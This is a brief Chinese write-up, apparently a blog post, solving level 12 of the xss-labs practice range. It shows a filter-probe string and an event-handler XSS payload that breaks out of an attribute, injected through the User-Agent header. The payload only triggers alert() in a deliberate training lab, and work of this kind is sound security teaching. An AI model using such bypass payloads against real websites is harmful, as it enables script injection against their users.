查看一下源码,发现这里是user_agent的值,那么就和上一关思路一样,抓包修改UA值
抓包修改先看一下过滤了什么,输入
" <Script><a Href=javascript:alert()> oNload Src Data;
只过滤掉了尖括号,我们可以利用事件绕过,payload同上一关,只是这次是在UA处修改
" onfocus=alert() autofocus type="text" "
**重点:**User-Agent头传值
xss-labs pass-12
Forfun_tt2025-10-24 15:10
相关推荐
敲敲了个代码4 小时前
从硬编码到 Schema 推断:前端表单开发的工程化转型dly_blog5 小时前
Vue 响应式陷阱与解决方案(第19节)消失的旧时光-19436 小时前
401 自动刷新 Token 的完整架构设计(Dio 实战版)console.log('npc')6 小时前
Table,vue3在父组件调用子组件columns列的方法展示弹窗文件预览效果用户47949283569156 小时前
React Hooks 的“天条”:为啥绝对不能写在 if 语句里?我命由我123456 小时前
SVG - SVG 引入(SVG 概述、SVG 基本使用、SVG 使用 CSS、SVG 使用 JavaScript、SVG 实例实操)用户47949283569157 小时前
给客户做私有化部署,我是如何优雅搞定 NPM 依赖管理的?C_心欲无痕7 小时前
vue3 - markRaw标记为非响应式对象qingyun9897 小时前
深度优先遍历:JavaScript递归查找树形数据结构中的节点标签熬夜敲代码的小N7 小时前
Vue (Official)重磅更新!Vue Language Tools 3.2功能一览!